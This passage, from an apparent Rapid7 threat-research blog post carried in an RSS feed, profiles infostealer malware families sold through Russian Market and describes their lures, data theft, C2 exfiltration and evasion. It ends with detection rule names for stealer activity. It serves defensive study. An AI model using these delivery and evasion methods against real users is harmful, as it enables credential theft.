Co####er’s use of a widely adopted and reliable infostealer likely contributed to their rapid rise, positioning them among the most active sellers on Russian Market in 2025.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte3328510b8fd226c/68e687b56c0dd2e379d37ea6/Figure_11.png" height="387" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_11.png" asset-alt="Figure_11.png" width="360" max-width="360" max-height="387" style="max-width: 360px; width: 360px; max-height: 387px; height: 387px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte3328510b8fd226c/68e687b56c0dd2e379d37ea6/Figure_11.png" data-sys-asset-uid="blte3328510b8fd226c" data-sys-asset-filename="Figure_11.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_11.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 11 - co####er’s profile</em></span></p><h2>Russian Market's top infostealer families</h2><p style="direction: ltr;"><span style='font-size: undefined;'>The sellers on Russian Market usually utilize similar types of information-stealing malware, with some of the most frequent ones being the following. As detailed further, all infostealers share similar traits and the same end goal: exfiltrating sensitive data from targeted servers. The table below lists the most common infostealers used by Russian Market sellers since 2021 (Table 2).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7efe4ab7cde8be7c/68e689386c0dd24079d37ec4/Table_2_V3.png" height="413" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Table_2_V3.png" asset-alt="Table_2_V3.png" width="717" max-width="717" max-height="413" style="max-width: 717px; width: 717px; max-height: 413px; height: 413px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7efe4ab7cde8be7c/68e689386c0dd24079d37ec4/Table_2_V3.png" data-sys-asset-uid="blt7efe4ab7cde8be7c" data-sys-asset-filename="Table_2_V3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Table_2_V3.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Table 2 - Most common infostealers used by Russian Market sellers since 2021</em></span></p><h4><span style='color:rgb(102, 102, 102);'>Raccoon</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The Raccoon information-stealing malware (AKA Mohazo, Racealer) was first observed by cybersecurity researchers in April 2019. Globally distributed as a malware-as-a-service (MaaS), Raccoon has infected hundreds of thousands of Windows devices in countries such as the United States, the United Kingdom, France, Germany, Italy, India, and Australia. The malware is considered by some as the successor of the now-defunct Azorult infostealer.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The malware, written in C++, is usually distributed through malvertising or phishing email message campaigns. It was also observed spreading through lure web pages redirecting users to landing sites containing exploit kits (e.g., Fallout and RIG exploit kits) or exhorting them to download seemingly legitimate software. Once installed, the infostealer connects to a command and control (C2) server and downloads a specific DLL file that is required for the exfiltration process. It then starts to collect sensitive information, such as system information, user credentials, and web browser information, including cookies, autocomplete data, history logs, and credit card information. It can also take screenshots, harvest cryptocurrency, and serve as a dropper for other malicious files. Raccoon deletes itself at the end of the exfiltration process.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Some members of the underground community attribute Raccoon to a user nicknamed “glad0ff,” who is the developer of other malware, such as Decrux, Acrux, and the Mimosa RAT. Other members link it to other infostealer malware, such as Vidar and Baldr, due to many similarities between them.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In March 2022, the Raccoon operators announced that they had suspended their activities after one of the malware developers died during the war in Ukraine (Figure 12). However, the threat actors resumed their operation a few months later with a new version of Raccoon.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt296f852908050c5e/68e68c01c7f3772e133fb429/Racoon.png" height="424" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Racoon.png" asset-alt="Racoon.png" width="772" max-width="772" max-height="424" style="max-width: 772px; width: 772px; max-height: 424px; height: 424px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt296f852908050c5e/68e68c01c7f3772e133fb429/Racoon.png" data-sys-asset-uid="blt296f852908050c5e" data-sys-asset-filename="Racoon.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Racoon.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 12 - Raccoon’s operation suspension message</em></span></p><h4><span style='color:rgb(102, 102, 102);'>Vidar</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>Vidar is a malware family, distributed mainly as an infostealer, that has been active since at least October 2018. The infostealer, whose name originates from Norse mythology, is based on Arkei stealer and is one of the first infostealers that is capable of obtaining information on two-factor authentication (2FA) software and the Tor browser.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Vidar usually spreads through phishing email messages, soliciting the victims to download and execute it. In addition, it was observed spreading through direct messages on social networks and false advertisements in various gaming forums. The malware is used to steal various types of sensitive information, such as documents, cookies, system information, user credentials, and money from cryptocurrency wallets. In addition, it can take screenshots of the victim’s machine. The stolen information is then exfiltrated to a corresponding C2 server.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The infostealer has been used as part of numerous malvertising campaigns that even involved the deployment of ransomware, such as GandCrab, Zeppelin, and DeathRansom. </span></p><h4><span style='color:rgb(102, 102, 102);'>Lumma</span><span style='color:rgb(102, 102, 102);'><strong> </strong></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The Lumma Stealer malware (AKA LummaC2) was first observed in August 2022, being sold by the threat actor, Shamel (AKA Lumma), on a Russian underground forum. Distributed as malware-as-a-service (MaaS), the infostealer is used by various threat actors in multiple campaigns around the world. Lumma Stealer seems to be based on Mars Stealer and Arkei.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Lumma Stealer, written in C, is primarily spread through malicious websites that promote illegal programs, such as software cracks and keygens. It was also observed being delivered using phishing email messages with malicious links. Once deployed (sometimes injected using PureCrypter), the malware collects general system information (for example, CPU name, physical memory, and system language) and harvests TXT files, cryptocurrency information, two-factor authentication (2FA) tokens, and web browser data (such as browser history, login information, and network cookies). The stolen information is then packed in a ZIP archive, which is exfiltrated to a C2 server over HTTP POST. To evade detection, Lumma Stealer performs anti-sandbox and anti-debugging checks while also being equipped with string and code obfuscation.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In May 2025, a coordinated law enforcement activity successfully disrupted Lumma Stealer’s operation. The authorities seized approximately 2,300 domains and part of Lumma Stealer’s infrastructure backbone based in Europe and Japan. However, only two months later, it was reported that the malware operation was gradually resuming activities.</span></p><h4><span style='color:rgb(102, 102, 102);'>RedLine</span><span style='color:rgb(102, 102, 102);'><strong> </strong></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The RedLine Stealer malware was first detected in February-March 2020 during the COVID-19 pandemic. It was part of a malspam campaign that encouraged victims to help fight the Coronavirus by installing a “legitimate” application on their system. The malware has been offered for sale on several Russian underground forums, with its price varying depending on the version (standalone/subscription) and other customization services sold by the threat actor.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>RedLine Stealer, written in C#, is constantly improving its capabilities and efficiency. Its main purpose is to harvest information from the victims’ infected machines, such as saved login credentials, credit card numbers, FTP servers, web browser data, instant messaging clients, and cryptocurrency wallet numbers. The malware can bypass security products, steal downloaded files, execute commands, and send all the collected data to a remote C2 server.</span></p><h4><span style='color:rgb(102, 102, 102);'>Stealc</span><span style='color:rgb(102, 102, 102);'><strong> </strong></span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The Stealc information-stealing malware was first reported by cybersecurity researchers in February 2023 after it was promoted on a Russian-speaking underground forum by a user named “Plymouth.” The malware’s code, written in C, is based on the following infostealers: Vidar, Raccoon, Mars, and RedLine. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Like other infostealers, Stealc is assumed to be distributed through malicious installers for allegedly cracked software. Once deployed, the malware deobfuscates its strings (mostly obfuscated with RC4 and Base64) and checks that it is not operating in a virtual environment or sandbox. When this passes, Stealc dynamically loads WinAPI functions and establishes a connection to a C2 server. Then, the infostealer starts collecting general system information and harvesting data from web browsers (for example, cookies, autofill data, and browsing history), extensions, cryptocurrency wallets, and different installed apps, such as Discord, Telegram, Outlook, and Steam. In addition, Stealc retrieves a custom file grabber to steal certain file types that are predetermined by its operators. The data is then exfiltrated to the C2 server over HTTP POST, and all traces of the malware are wiped from the system.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In October 2024, the Dutch National Police seized the network infrastructure for RedLine as part of Operation Magnus. However, the infostealer’s operation seems to continue despite these law enforcement activities.    </span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>2025 overview of infostealers</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Examining the most frequently utilized infostealers in Russian Market in the first half of 2025 (Figure 13), we can see that, besides the four infostealers mentioned earlier, two additional infostealers recently turned popular among sellers, Rhadamanthys and Acreed. This is in parallel with the decline in the use of Raccoon. Lumma Stealer has dominated the infostealers market in the first four months of the year, but there is a noticeable decline in its supremacy since the law enforcement activities against it in May 2025. </span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt39d9885fbabd04ce/68e68938c124d35b4705cb28/Figure_13_V3.png" height="457" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure_13_V3.png" asset-alt="Figure_13_V3.png" width="722" max-width="722" max-height="457" style="max-width: 722px; width: 722px; max-height: 457px; height: 457px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt39d9885fbabd04ce/68e68938c124d35b4705cb28/Figure_13_V3.png" data-sys-asset-uid="blt39d9885fbabd04ce" data-sys-asset-filename="Figure_13_V3.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure_13_V3.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 13 - Most frequently utilized infostealers in Russian Market in the first half of 2025</em></span></p><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Rhadamanthys</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The Rhadamanthys information-stealing malware has been active since at least August 2022. The malware-as-a-service (MaaS) was discovered after it was put on sale on underground hacking forums. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Rhadamanthys spreads through malicious Google Ads or phishing email messages that lead the victims to seemingly legitimate websites of popular software, such as Zoom, AnyDesk, and Notepad++. Once executed, Rhadamanthys collects general system information (e.g., computer name, username, and OS version) using Windows Management Instrumentation (WMI) queries and then starts harvesting data from web browsers (e.g., browsing history, cookies, and login credentials), cryptocurrency wallets and extensions, and other applications, such as FTP and email clients, file managers, password managers, and messaging platforms. In addition, it can take screenshots of the victim’s machine. All the collected data is exfiltrated to a remote C2 server that is accessed through a dedicated panel.  </span></p><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Acreed</span></h4><p style="direction: ltr;"><span style='font-size: undefined;'>The Acreed information-stealing malware has been active since at least February 2025. Cybersecurity researchers assert that the use of Acreed soared following the downturn of Lumma Stealer, as a result of law enforcement activities.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Acreed is distributed through phishing email messages with malicious attachments or links, malvertising campaigns promoting malware-embedded installers for legitimate software, ClickFix attacks using fake CAPTCHA, or malicious tutorials on social platforms, such as YouTube and TikTok. Once executed, the malware exfiltrates general system information (for example, username, IP addresses, and HWID), web browser data, including cookies and saved passwords, cryptocurrency information, and session tokens from cloud platforms, such as Microsoft 365, Google, AWS, Azure, and Salesforce. At the end of the collection process, the infostealer produces a JSON file that details the number of files gathered from each type of data (Figure 14).</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt89d283718789f899/68e68cbf758f5b1bced9e5c7/Figure14.png" height="425" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Figure14.png" asset-alt="Figure14.png" width="549" max-width="549" max-height="425" style="max-width: 549px; width: 549px; max-height: 425px; height: 425px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt89d283718789f899/68e68cbf758f5b1bced9e5c7/Figure14.png" data-sys-asset-uid="blt89d283718789f899" data-sys-asset-filename="Figure14.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Figure14.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 14 - An example of content harvested by Acreed and sold on Russian Market</em></span></p><h2>What organizations should do</h2><p style="direction: ltr;"><span style='font-size: undefined;'>Russian Market manifests a dynamic and persistent cybercrime ecosystem that has become a dominant hub for stolen user credentials and information-stealing malware logs. The marketplace’s unconventional endurance, compared to other major underground venues, makes it a primary generator of cybercriminal activity, fueling a wide array of cyberattacks globally. Despite law enforcement efforts targeting cybercrime marketplaces and malware operations, the core operations of Russian Market and its prolific sellers continue, demonstrating the resilience and adaptability of these illicit platforms.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Analyzing the main forces that function in this unlawful domain reveals a very short list of entities facilitating the entire operation, with only one or two major players joining the fray each year. The same goes for the infostealers they use, which are replaced every once in a while due to law enforcement activity, but are generally drawn from the same, closed set. </span></p><p style="direction: ltr;"><span style='font-size: undefined;'>For organizations, the pervasive trade of stolen credentials on platforms, such as Russian Market, necessitates robust defenses, including multi-factor authentication, continuous monitoring for compromised accounts, and proactive threat intelligence. Understanding the mechanics and key players within Russian Market is crucial for developing effective strategies to combat the escalating threat of credential-based cyberattacks.         </span></p><h2>Detections for Rapid7 customers</h2><p style="direction: ltr;"><span style='font-size: undefined;'>There are multiple detections currently in place for our MDR Customers to identify and alert on the common infostealer threat actor behaviors described in this blog, including Redline, Lumma, Vidar/Stealc, and Raccoon. Specifically:</span></p><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Redline</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>ET MALWARE RedLine Stealer - CheckConnect Response</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>ET MALWARE Redline - GetArguments Request</span></p></li></ul><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Lumma</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process - Lumma Stealer Related Process Executed</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Web Request - Lumma Stealer URL Observed</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>IDS (ET MALWARE) related detections</span></p></li></ul><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Vidar/Stealc</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Process - Vidar/Stealc Related Binary Executed</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Suspicious Web Request - Vidar/Stealc Stealer URL Observed</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>IDS (ET MALWARE) related detections</span></p></li></ul><h4 style="direction: ltr;"><span style='color:rgb(102, 102, 102);'>Raccoon</span></h4><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>IDS (ET MALWARE) related detections for C2 domains</span></p></li></ul><h3>Intelligence Hub </h3><p>Customers leveraging Rapid7’s Intelligence Hub can access indicators of compromise (IOCs) related to Vidar and Lumma, as well as the latest developments and associated campaigns.</p><p><span style='font-size: undefined;'>In addition to the above, there are multiple detections in place for Threat Command and MDRP customers to identify and alert on the threat actor behaviors described in this blog. Specifically, Threat Command monitors dark web activity, including company credentials harvested with infostealers and sold on Russian Market. Relevant bots are flagged based on the customer’s assets—such as domains, brand names, company names, external IP addresses, or login pages. When a bot containing these assets is identified, a “Bot Data for Sale” alert is issued (Figure 15). In addition to notifying customers of credential exposure, these alerts enable them to quickly and securely acquire the detected bot through the “Ask an Analyst” service.</span></p><p>⠀</p><figure style="margin: 0"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5af21cdeef2e5d42/68ee4729c43e2f25c57bf501/Screenshot_2025-09-30_at_14.04.49.png" height="492" position="center" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="Screenshot_2025-09-30_at_14.04.49.png" asset-alt="Screenshot_2025-09-30_at_14.04.49.png" width="715" max-width="715" max-height="492" style="max-width: 715px; width: 715px; max-height: 492px; height: 492px; text-align: center" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt5af21cdeef2e5d42/68ee4729c43e2f25c57bf501/Screenshot_2025-09-30_at_14.04.49.png" data-sys-asset-uid="blt5af21cdeef2e5d42" data-sys-asset-filename="Screenshot_2025-09-30_at_14.04.49.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="Screenshot_2025-09-30_at_14.04.49.png" sys-style-type="display"/></figure><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 15 - Example of an alert about a bot available for sale on Russian Market</em></span></p>]]></description>
      <link>https://www.rapid7.com/blog/post/tr-inside-russian-market-uncovering-the-botnet-empire</link>
      <guid isPermaLink="false">blt894d1587b991c887</guid>
      <category><![CDATA[Research]]></category>
      <category><![CDATA[Labs]]></category>
      <category><![CDATA[Malware]]></category><dc:creator><![CDATA[Alexandra Blia]]></dc:creator>
      <pubDate>Wed, 08 Oct 2025 16:00:00 GMT</pubDate><media:content url="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt87b8c37fd4c96487/68e68d8b33892a40b8a747c2/Article_main_image.png" medium="image" />
    </item>
  </channel>
</rss>